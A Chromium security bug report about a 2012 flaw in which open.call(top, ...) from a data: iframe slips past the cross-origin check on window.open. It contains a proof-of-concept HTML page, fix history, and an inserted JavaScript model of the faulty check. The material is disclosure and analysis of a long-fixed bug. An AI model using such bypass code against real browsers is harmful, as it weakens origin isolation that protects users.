Status: Fixed
Closed: Mar 2012
OS: All
Pri: 2
Type: Bug-Security

open.call(other_window) circumvents check in other_window.open()
Project Member Reported by tsepez@chromium.org, Mar 15 2012
Small fallout from Pwnium.
Repro'd on 19.0.1061.0 Linux 64.

<html>
<body>
<button onclick='go()'>click</button>
<script>function go () { top.open('http://youtube.com'); }</script>
<!-- frame 1: calls top.open() directly; blocked with the unsafe-access error -->
<iframe src="data:text/html,<html><body><button onclick='go()'>click</button>
             <script>function go () { top.open('http://youtube.com'); }</script></body></html>">
</iframe>
<!-- frame 2: same call made as open.call(top, ...); the window opens -->
<iframe src="data:text/html,<html><body><button onclick='go()'>click</button>
             <script>function go () { open.call(top, 'http://youtube.com'); }</script></body></html>">
</iframe>
</body>
</html>

Clicking the first of the iframed buttons blocks top opening a new window with the security error: Unsafe JavaScript attempt to access frame ...
Clicking the second causes it to open.

Possible missing security check in V8DOMWindowCustom.cpp ??

Secseverity really really low.  Would have made Sergey's life more difficult, though.
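As an added illustration, not code from the report or from WebKit, here is a small JavaScript model of the defect the title describes: an access check keyed to the window a method belongs to while the action is carried out on the receiver (`this`), which Function.prototype.call can point at any other window. `Win`, `makeOpen`, `scenario` and the explicit `caller` parameter are constructed for the model; origins are compared as plain strings.

```javascript
// Added example (not from the bug or from WebKit): model of a DOM-binding
// access check that looks at the wrong window. Every name here is constructed.

class Win {
  constructor(name, origin) {
    this.name = name;
    this.origin = origin;
    this.opened = []; // URLs "opened" on this window
  }
}

// Build an `open` method for `owner`. With checkReceiver=false the check
// looks at the owner window while the work is done on `this` (the flaw);
// with checkReceiver=true the check and the action refer to the same window.
function makeOpen(owner, checkReceiver) {
  return function open(url, caller) {
    // `caller` stands in for the window whose script is running.
    const checked = checkReceiver ? this : owner;
    if (caller.origin !== checked.origin) {
      return `blocked: Unsafe JavaScript attempt to access frame ${checked.name} from ${caller.name}`;
    }
    this.opened.push(url); // the action always lands on the receiver
    return `opened ${url} from ${this.name}`;
  };
}

// Scenario from the report: a data: iframe (opaque origin) inside a top window.
function scenario(checkReceiver) {
  const top = new Win("top", "http://example.test");
  const frame = new Win("frame", "null"); // data: URL gets an opaque origin
  top.open = makeOpen(top, checkReceiver);
  frame.open = makeOpen(frame, checkReceiver);
  const url = "http://youtube.com";
  return {
    direct: top.open(url, frame),              // top.open(url) from the frame
    viaCall: frame.open.call(top, url, frame), // open.call(top, url) from the frame
    topOpened: top.opened.length,              // windows actually opened on top
  };
}
```

Run with `scenario(false)` for the flawed binding (the second call succeeds) and `scenario(true)` for the corrected one (both calls are blocked).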
 
Comment 1 by tsepez@chromium.org, Mar 15 2012
Safari 5.1.2 does not have the same issue.  Gives an unsafe JavaScript error in both cases.
Comment 3 by tsepez@chromium.org, Mar 16 2012
Owner: tsepez@chromium.org
Status: Assigned
likely regression from http://trac.webkit.org/changeset/64991/
Comment 4 by cdn@chromium.org, Mar 16 2012
Labels: Mstone-18
Labels: Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/111098

Labels: pwnium
Labels: -Restrict-View-SecurityTeam -Merge-Approved Restrict-View-SecurityNotify Merge-Merged
M18: http://trac.webkit.org/changeset/112461
Labels: CVE-2011-3072
Comment 9 by cdn@chromium.org, May 15 2012
Status: Fixed
Marking old security bugs Fixed.
Labels: -Restrict-View-SecurityNotify
Project Member Comment 11 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member Comment 12 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Type-Security -Area-WebKit -SecSeverity-Low -SecImpacts-Stable -SecImpacts-Beta -Mstone-18 Cr-Content Security-Severity-Low Security-Impact-Stable Security-Impact-Beta M-18 Type-Bug-Security
Project Member Comment 13 by bugdroid1@chromium.org, Mar 13 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Project Member Comment 14 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-Low Security_Severity-Low
Project Member Comment 15 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 16 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member Comment 17 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content Cr-Blink
Project Member Comment 18 by sheriffbot@chromium.org, Jun 14 2016
Labels: -security_impact-beta
Project Member Comment 19 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 20 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic